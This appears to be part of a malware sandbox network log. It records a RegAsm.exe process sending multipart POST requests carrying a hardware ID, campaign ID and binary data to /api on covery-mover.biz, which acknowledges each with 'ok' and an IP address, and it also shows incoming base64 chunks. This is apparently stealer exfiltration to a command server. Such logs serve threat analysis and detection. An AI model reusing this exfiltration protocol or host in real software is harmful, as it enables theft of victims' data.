                                                                        2024-12-12 06:52:16 UTC | 360 | IN | Data Raw: 31 64 33 32 0d 0a 65 56 38 37 30 4a 79 75 35 67 62 35 71 5a 71 38 48 31 7a 71 65 2b 6e 61 68 66 46 34 54 6f 50 39 6e 4e 69 57 4e 51 67 62 33 72 45 43 66 55 33 79 70 70 72 4b 4a 49 72 4d 75 49 5a 72 4c 70 38 65 78 66 6a 6b 6c 56 70 30 35 5a 7a 77 71 2f 4d 5a 4b 6d 32 7a 6b 30 4d 35 57 72 7a 76 79 38 6f 6b 6e 4e 47 34 68 6b 51 6e 79 42 36 48 2b 4c 2f 54 48 53 54 68 6e 50 43 36 39 31 35 6e 61 37 4c 53 45 54 4e 63 75 50 6e 4e 67 6d 65 56 78 50 2f 5a 65 6a 32 41 46 59 43 33 37 5a 78 61 59 71 47 59 35 76 71 73 46 30 56 2b 71 74 41 30 50 6b 69 37 76 74 50 4b 66 64 76 4d 39 4a 34 6c 66 6f 73 65 69 37 62 6a 6c 52 4d 6d 36 35 58 34 75 2f 4a 66 65 48 4b 34 32 52 45 39 58 37 6e 7a 78 4a 5a 71 6e 38 50 30 33 33 41 39 79 46 66 4c 76 2f 2f 54 51 6d 79 79 72 66 32 72 35
                                                                        Data Ascii: 1d32eV870Jyu5gb5qZq8H1zqe+nahfF4ToP9nNiWNQgb3rECfU3ypprKJIrMuIZrLp8exfjklVp05Zzwq/MZKm2zk0M5Wrzvy8oknNG4hkQnyB6H+L/THSThnPC6915na7LSETNcuPnNgmeVxP/Zej2AFYC37ZxaYqGY5vqsF0V+qtA0Pki7vtPKfdvM9J4lfosei7bjlRMm65X4u/JfeHK42RE9X7nzxJZqn8P033A9yFfLv//TQmyyrf2r5
                                                                        2024-12-12 06:52:16 UTC | 1369 | IN | Data Raw: 44 7a 32 32 38 31 67 52 53 47 75 4f 71 5a 46 53 2f 68 6d 50 53 77 2b 31 31 75 64 4c 48 56 47 7a 30 5a 2f 4c 37 4c 6e 43 54 44 69 39 76 62 62 54 6d 45 44 38 6d 43 70 34 78 55 4e 61 47 59 38 76 71 73 46 32 4a 38 76 39 41 51 4d 6c 71 36 39 64 36 45 64 70 33 47 2f 63 78 37 4f 34 59 54 69 4b 72 74 6e 52 77 76 36 4a 54 33 76 2f 4e 54 4b 6a 66 38 31 41 4e 39 41 66 4c 66 77 59 39 6f 6b 64 7a 34 6e 6d 4a 77 6b 56 6d 4d 74 4b 66 4c 57 69 6a 67 6d 2f 2b 2b 2b 6c 6c 75 64 62 72 64 46 6a 4a 66 75 50 37 4c 6a 6d 79 54 79 76 58 56 63 6a 36 4e 46 49 2b 2b 36 35 49 66 62 4b 2f 66 2b 61 4b 30 44 79 70 58 75 39 41 4a 66 32 79 78 38 4d 4b 44 63 74 76 55 74 73 63 39 4f 59 52 5a 30 2f 6a 70 6c 68 55 2b 34 49 33 37 74 4f 5a 62 62 33 2b 78 30 42 55 39 58 4c 58 7a 77 6f 4a 6a 6d
                                                                        Data Ascii: Dz2281gRSGuOqZFS/hmPSw+11udLHVGz0Z/L7LnCTDi9vbbTmED8mCp4xUNaGY8vqsF2J8v9AQMlq69d6Edp3G/cx7O4YTiKrtnRwv6JT3v/NTKjf81AN9AfLfwY9okdz4nmJwkVmMtKfLWijgm/+++lludbrdFjJfuP7LjmyTyvXVcj6NFI++65IfbK/f+aK0DypXu9AJf2yx8MKDctvUtsc9OYRZ0/jplhU+4I37tOZbb3+x0BU9XLXzwoJjm
                                                                        2024-12-12 06:52:16 UTC | 1369 | IN | Data Raw: 39 4f 59 52 5a 30 2f 6a 71 6d 78 38 70 37 70 37 30 74 50 46 64 5a 6e 47 79 30 41 6b 79 58 62 4c 79 78 49 35 70 6c 63 2f 77 31 33 59 31 6a 68 6d 4b 73 71 66 64 57 69 76 35 33 36 62 36 77 46 42 6d 64 4c 4f 52 4c 6a 35 58 76 50 6e 61 78 48 76 56 30 72 6a 5a 63 58 37 51 57 59 65 78 35 35 67 51 4b 4f 47 59 38 37 2f 33 55 47 6c 30 75 39 6b 56 4f 6c 32 2b 39 38 47 43 5a 4a 7a 50 2f 63 78 34 4e 34 51 56 79 2f 61 6e 6c 41 4a 73 75 64 2f 52 76 65 4a 55 52 58 71 74 32 6c 73 69 46 36 75 2b 79 34 67 6b 77 34 76 2f 32 33 55 31 6a 68 47 4c 71 75 4b 64 45 53 33 72 6d 66 2b 33 2b 46 46 71 65 4c 7a 56 46 7a 31 65 74 65 7a 65 67 57 4b 4a 77 62 69 51 50 54 6d 51 57 64 50 34 30 59 4d 4e 50 66 66 64 79 37 6e 36 57 57 31 76 2f 4d 78 56 4a 42 6d 31 38 6f 7a 63 4a 4a 44 4c 39 4e
                                                                        Data Ascii: 9OYRZ0/jqmx8p7p70tPFdZnGy0AkyXbLyxI5plc/w13Y1jhmKsqfdWiv536b6wFBmdLORLj5XvPnaxHvV0rjZcX7QWYex55gQKOGY87/3UGl0u9kVOl2+98GCZJzP/cx4N4QVy/anlAJsud/RveJURXqt2lsiF6u+y4gkw4v/23U1jhGLquKdES3rmf+3+FFqeLzVFz1etezegWKJwbiQPTmQWdP40YMNPffdy7n6WW1v/MxVJBm18ozcJJDL9N
                                                                        2024-12-12 06:52:16 UTC | 1369 | IN | Data Raw: 47 59 61 38 36 35 63 53 4a 2b 76 66 73 50 72 7a 54 79 6f 68 2f 4f 59 57 4d 6c 6d 78 36 49 79 62 4b 6f 4b 4c 2f 39 49 39 5a 73 67 56 68 62 6a 6f 6e 78 59 6e 36 5a 37 79 74 50 4e 53 59 33 47 30 77 52 6f 35 55 62 50 77 77 34 56 67 6e 73 37 38 32 58 6b 34 68 31 6e 46 2b 4f 43 4c 57 6e 53 68 73 4e 6d 50 74 6e 5a 51 4f 61 4f 64 41 6e 31 65 76 72 36 55 78 47 69 59 78 2f 44 52 65 7a 65 45 45 34 4b 7a 36 35 67 65 49 4f 69 61 2b 4c 76 78 55 6d 74 39 73 4e 6b 64 50 6c 71 39 38 63 4f 4d 4a 4e 57 4c 2f 38 59 39 5a 73 67 38 6e 4c 50 70 6c 56 6f 7a 72 34 61 2b 76 66 67 58 4d 6a 6d 77 32 68 30 37 58 4c 37 2f 79 6f 78 68 6b 38 2f 35 32 48 73 39 68 78 32 4f 75 65 69 58 46 69 4c 72 6e 76 2b 32 2f 31 68 68 66 50 79 64 57 7a 70 42 38 71 61 4d 74 57 65 4e 33 4f 6a 53 50 53 48
                                                                        Data Ascii: GYa865cSJ+vfsPrzTyoh/OYWMlmx6IybKoKL/9I9ZsgVhbjonxYn6Z7ytPNSY3G0wRo5UbPww4Vgns782Xk4h1nF+OCLWnShsNmPtnZQOaOdAn1evr6UxGiYx/DRezeEE4Kz65geIOia+LvxUmt9sNkdPlq98cOMJNWL/8Y9Zsg8nLPplVozr4a+vfgXMjmw2h07XL7/yoxhk8/52Hs9hx2OueiXFiLrnv+2/1hhfPydWzpB8qaMtWeN3OjSPSH
                                                                        2024-12-12 06:52:16 UTC | 1369 | IN | Data Raw: 2f 2f 54 51 6d 7a 50 6c 4f 32 74 39 31 6c 68 62 36 65 54 42 48 4e 41 38 76 6e 41 78 44 7a 62 79 50 50 56 65 54 36 45 47 59 2b 31 35 34 45 56 4b 2b 61 57 39 61 6a 2b 55 47 31 79 74 4e 67 55 4f 30 75 2b 38 4e 36 42 64 6f 6d 4c 74 70 35 36 4a 73 68 42 79 34 37 67 67 77 6f 76 6f 36 37 6f 75 65 4a 63 5a 33 58 38 7a 46 55 6b 47 62 58 79 6a 4e 77 6b 6e 63 54 78 33 58 49 2f 67 52 57 47 76 65 36 57 47 79 72 6c 6c 66 53 36 38 6c 46 72 66 4c 62 51 47 6a 64 51 74 66 62 4c 68 33 62 62 68 62 6a 5a 5a 58 37 51 57 61 4b 2f 39 5a 30 4b 62 50 37 52 35 2f 72 7a 57 79 6f 68 2f 4e 63 52 4d 6c 32 31 38 73 71 42 59 70 62 4b 39 39 39 39 4d 59 77 53 67 72 37 6d 6e 68 38 68 35 59 33 30 73 66 74 62 59 33 57 78 6b 31 56 39 58 71 71 2b 6c 4d 52 56 6c 73 58 32 32 57 74 2b 6c 31 65 53
                                                                        Data Ascii: //TQmzPlO2t91lhb6eTBHNA8vnAxDzbyPPVeT6EGY+154EVK+aW9aj+UG1ytNgUO0u+8N6BdomLtp56JshBy47ggwovo67oueJcZ3X8zFUkGbXyjNwkncTx3XI/gRWGve6WGyrllfS68lFrfLbQGjdQtfbLh3bbhbjZZX7QWaK/9Z0KbP7R5/rzWyoh/NcRMl218sqBYpbK9999MYwSgr7mnh8h5Y30sftbY3Wxk1V9Xqq+lMRVlsX22Wt+l1eS
                                                                        2024-12-12 06:52:16 UTC | 1369 | IN | Data Raw: 6b 71 35 35 54 79 71 50 31 58 61 58 4c 38 6e 56 73 36 51 66 4b 6d 6a 4b 64 7a 6a 63 48 2f 30 6d 73 31 69 52 71 64 74 66 66 54 56 47 7a 77 6d 4f 2f 36 72 45 46 36 62 72 76 4d 56 53 51 5a 74 66 4b 4d 33 43 53 64 77 76 37 5a 65 7a 43 61 48 49 32 33 36 4a 6f 54 4b 4f 6d 63 2f 72 37 77 55 47 39 36 73 4e 67 63 50 6c 61 32 39 38 4b 4e 61 39 75 46 75 4e 6c 6c 66 74 42 5a 71 71 50 6b 6e 78 64 73 2f 74 48 6e 2b 76 4e 62 4b 69 48 38 33 78 55 34 57 62 6a 34 79 49 46 69 6b 63 37 34 31 58 34 78 6a 42 2b 50 74 2b 65 59 45 79 33 6e 6d 76 53 78 38 6c 70 70 66 37 71 54 56 58 31 65 71 72 36 55 78 45 53 41 78 76 54 5a 50 53 48 47 41 4d 75 2f 36 39 4e 43 62 4f 71 54 2b 72 33 30 57 6d 6c 78 75 64 63 52 4f 46 6d 36 37 4d 53 45 59 34 6e 5a 2b 4e 64 34 4d 6f 73 5a 6a 37 37 75 6c
                                                                        Data Ascii: kq55TyqP1XaXL8nVs6QfKmjKdzjcH/0ms1iRqdtffTVGzwmO/6rEF6brvMVSQZtfKM3CSdwv7ZezCaHI236JoTKOmc/r7wUG96sNgcPla298KNa9uFuNllftBZqqPknxds/tHn+vNbKiH83xU4Wbj4yIFikc741X4xjB+Pt+eYEy3nmvSx8lppf7qTVX1eqr6UxESAxvTZPSHGAMu/69NCbOqT+r30WmlxudcROFm67MSEY4nZ+Nd4MosZj77ul
                                                                        2024-12-12 06:52:16 UTC | 277 | IN | Data Raw: 4f 77 50 71 73 54 6c 51 35 74 38 55 63 4c 56 71 6b 39 63 47 49 64 61 57 4c 6f 49 6f 76 62 4e 70 4c 32 61 65 6e 6a 43 56 69 6f 5a 36 2b 34 73 31 4f 4b 6d 2f 38 69 30 6c 7a 47 61 43 2b 6c 4d 51 6a 6d 4e 6e 71 32 48 34 6f 69 31 36 31 68 73 43 46 45 43 76 78 6d 4f 6d 31 74 42 6b 71 64 76 79 4c 49 6e 31 51 74 65 58 64 6b 6d 6d 4c 7a 4c 6a 68 4d 33 36 51 57 64 50 34 30 70 41 55 49 75 61 4a 37 2f 66 54 51 57 42 2b 72 4e 51 4d 4d 68 6e 38 76 73 72 45 50 4d 69 46 75 4e 70 73 66 74 42 4a 32 65 4f 79 77 45 31 38 73 34 43 77 6f 37 52 42 4b 69 48 75 6e 56 73 76 47 65 71 2b 69 34 64 32 69 63 33 37 79 48 35 35 74 69 65 73 6f 75 71 56 44 54 33 66 6f 66 6d 67 2b 56 46 39 61 50 44 47 47 44 4e 58 74 65 69 4d 79 69 53 55 69 36 44 6e 50 58 62 49 4a 73 58 34 2f 39 4e 43 62 4e
                                                                        Data Ascii: OwPqsTlQ5t8UcLVqk9cGIdaWLoIovbNpL2aenjCVioZ6+4s1OKm/8i0lzGaC+lMQjmNnq2H4oi161hsCFECvxmOm1tBkqdvyLIn1QteXdkmmLzLjhM36QWdP40pAUIuaJ7/fTQWB+rNQMMhn8vsrEPMiFuNpsftBJ2eOywE18s4Cwo7RBKiHunVsvGeq+i4d2ic37yH55tiesouqVDT3fofmg+VF9aPDGGDNXteiMyiSUi6DnPXbIJsX4/9NCbN
                                                                        2024-12-12 06:52:16 UTC | 1369 | IN | Data Raw: 32 31 34 63 0d 0a 4c 45 59 74 75 54 71 4a 41 39 4f 70 6c 5a 30 2b 69 31 79 45 39 2f 74 73 2b 73 70 62 70 4f 4b 6d 2f 38 69 30 6c 7a 47 61 43 2b 6c 4d 51 6a 6d 4e 6e 71 32 48 34 6f 69 31 36 31 68 73 6d 55 48 43 6e 6d 6a 37 79 55 2f 30 4e 74 4f 66 4b 54 46 48 30 42 69 37 36 45 78 46 76 56 69 2b 43 65 4a 58 36 39 47 6f 57 32 34 49 55 4c 59 63 2b 59 2b 4c 2f 7a 52 79 68 58 74 38 63 63 66 52 66 79 2b 49 7a 63 4e 4e 57 4c 2f 4d 38 39 5a 74 68 4c 30 4f 32 30 78 45 70 2b 2f 74 48 6e 2b 75 49 58 4d 69 76 79 6b 77 6c 39 41 66 4b 35 7a 35 5a 32 6e 63 6a 75 33 54 6f 41 74 68 71 64 74 65 69 59 47 78 4c 66 73 66 4f 37 39 31 6b 6f 53 4b 72 65 43 7a 35 63 74 63 44 79 69 6d 4f 50 7a 50 62 59 66 58 37 47 57 59 54 34 76 36 70 61 5a 4b 47 67 73 50 72 73 46 7a 49 35 69 64 41
                                                                        Data Ascii: 214cLEYtuTqJA9OplZ0+i1yE9/ts+spbpOKm/8i0lzGaC+lMQjmNnq2H4oi161hsmUHCnmj7yU/0NtOfKTFH0Bi76ExFvVi+CeJX69GoW24IULYc+Y+L/zRyhXt8ccfRfy+IzcNNWL/M89ZthL0O20xEp+/tHn+uIXMivykwl9AfK5z5Z2ncju3ToAthqdteiYGxLfsfO791koSKreCz5ctcDyimOPzPbYfX7GWYT4v6paZKGgsPrsFzI5idA
                                                                        2024-12-12 06:52:16 UTC | 1369 | IN | Data Raw: 4f 65 4d 6b 69 54 44 6d 62 61 65 62 33 37 51 57 63 79 37 39 59 45 63 4c 2f 65 63 75 59 54 4b 63 47 52 2b 76 63 55 4c 4d 46 57 54 2f 64 32 4f 57 71 58 65 2b 39 42 7a 4f 5a 34 49 79 2f 61 6e 6e 46 70 30 32 4e 2b 32 2b 73 73 5a 4b 6d 48 38 69 31 73 49 57 72 7a 77 79 35 4a 31 31 75 7a 32 32 58 77 6f 6d 42 53 48 6d 65 53 43 45 47 79 76 33 2f 6a 36 72 41 55 6b 4f 62 6a 43 57 32 55 4a 34 4b 57 5a 31 7a 50 4c 6d 65 65 51 5a 48 36 65 57 64 50 71 71 64 4d 49 62 4c 6e 66 75 62 6e 6d 52 57 78 36 71 74 42 63 41 32 65 58 36 63 2b 55 59 70 6a 31 78 76 56 78 4f 49 38 44 6a 4c 37 42 73 31 70 69 6f 5a 43 2b 34 73 30 58 49 6a 6d 44 6e 56 73 6c 47 65 71 2b 2b 59 64 71 6c 63 7a 75 7a 7a 41 62 6e 78 71 62 76 75 54 54 56 47 7a 6e 33 36 62 71 75 68 64 75 61 50 79 4c 53 32 38 43
                                                                        Data Ascii: OeMkiTDmbaeb37QWcy79YEcL/ecuYTKcGR+vcULMFWT/d2OWqXe+9BzOZ4Iy/annFp02N+2+ssZKmH8i1sIWrzwy5J11uz22XwomBSHmeSCEGyv3/j6rAUkObjCW2UJ4KWZ1zPLmeeQZH6eWdPqqdMIbLnfubnmRWx6qtBcA2eX6c+UYpj1xvVxOI8DjL7Bs1pioZC+4s0XIjmDnVslGeq++YdqlczuzzAbnxqbvuTTVGzn36bquhduaPyLS28C


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        2 | 192.168.2.4 | 49739 | 172.67.206.64 | 443 | 7184 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-12-12 06:52:18 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=YPG1TIB3SUIY02Y203Y
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 18169
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:18 UTC | 15331 | OUT | Data Raw: 2d 2d 59 50 47 31 54 49 42 33 53 55 49 59 30 32 59 32 30 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 59 50 47 31 54 49 42 33 53 55 49 59 30 32 59 32 30 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 50 47 31 54 49 42 33 53 55 49 59 30 32 59 32 30 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74
                                                                        Data Ascii: --YPG1TIB3SUIY02Y203YContent-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--YPG1TIB3SUIY02Y203YContent-Disposition: form-data; name="pid"2--YPG1TIB3SUIY02Y203YContent-Disposition: form-data; name="lid"DUkgLv--ot
                                                                        2024-12-12 06:52:18 UTC | 2838 | OUT | Data Raw: 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62
                                                                        Data Ascii: ,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pyb
                                                                        2024-12-12 06:52:19 UTC | 1013 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=6srn1qaef6b2gl6ffbckgh90ar; expires=Mon, 07-Apr-2025 00:38:57 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jbw%2B%2FgApoWw5XdoJWFHY2yaSo6puc6IpcN9BYYoPGUFseSzMIRP5VJMQEfvg6gCHRyzKW1XXIoZs%2B4OZVFoyITkngDzIPyeNdlfWuLJYEVI9GoukhZVuX0bUtdfkdWBgIHKJ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca76ef8e0f77-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1677&rtt_var=652&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19132&delivery_rate=1648785&cwnd=231&unsent_bytes=0&cid=1ef70a5d3bc0c60d&ts=862&x=0"
                                                                        2024-12-12 06:52:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                        Data Ascii: fok 8.46.123.175
                                                                        2024-12-12 06:52:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        3 | 192.168.2.4 | 49740 | 172.67.206.64 | 443 | 7184 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-12-12 06:52:20 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=G2LZBTFA26935Y
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8760
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:20 UTC | 8760 | OUT | Data Raw: 2d 2d 47 32 4c 5a 42 54 46 41 32 36 39 33 35 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 47 32 4c 5a 42 54 46 41 32 36 39 33 35 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 32 4c 5a 42 54 46 41 32 36 39 33 35 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74 64 65 6c 0d 0a 2d 2d 47 32 4c 5a 42 54 46 41
                                                                        Data Ascii: --G2LZBTFA26935YContent-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--G2LZBTFA26935YContent-Disposition: form-data; name="pid"2--G2LZBTFA26935YContent-Disposition: form-data; name="lid"DUkgLv--otdel--G2LZBTFA
                                                                        2024-12-12 06:52:21 UTC | 1014 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=nk5c2pi9p773p2596d1i1fsqf2; expires=Mon, 07-Apr-2025 00:38:59 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mcS9MVby2uIWvRllmfoqBj6GSBBC%2B%2FOSR2BQHbT2tY%2BIj4HFdLUGaLLDZx%2B3gnX31yg4PcUo53d2R4DnDhk74iTfVjL0LITL1lJBHfMHLNUUqUCh46edUUXKaFRvuF277BQa"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca84cc798c69-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1763&rtt_var=673&sent=11&recv=14&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9695&delivery_rate=1611479&cwnd=217&unsent_bytes=0&cid=5347841f4740a6f9&ts=773&x=0"
                                                                        2024-12-12 06:52:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                        Data Ascii: fok 8.46.123.175
                                                                        2024-12-12 06:52:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 172.67.206.64 | Destination Port: 443 | PID: 7184 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-12-12 06:52:22 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=Z4TTJ1VUF4OCQR1DRE5
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 20443
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:22 UTC | 15331 | OUT | Data Raw: 2d 2d 5a 34 54 54 4a 31 56 55 46 34 4f 43 51 52 31 44 52 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 5a 34 54 54 4a 31 56 55 46 34 4f 43 51 52 31 44 52 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 34 54 54 4a 31 56 55 46 34 4f 43 51 52 31 44 52 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74
                                                                        Data Ascii: --Z4TTJ1VUF4OCQR1DRE5Content-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--Z4TTJ1VUF4OCQR1DRE5Content-Disposition: form-data; name="pid"3--Z4TTJ1VUF4OCQR1DRE5Content-Disposition: form-data; name="lid"DUkgLv--ot
                                                                        2024-12-12 06:52:22 UTC | 5112 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                        Data Ascii: `M?lrQMn 64F6(X&7~`
                                                                        2024-12-12 06:52:23 UTC | 1016 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=895bd9maeuomhdhm1no7jgfskl; expires=Mon, 07-Apr-2025 00:39:02 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
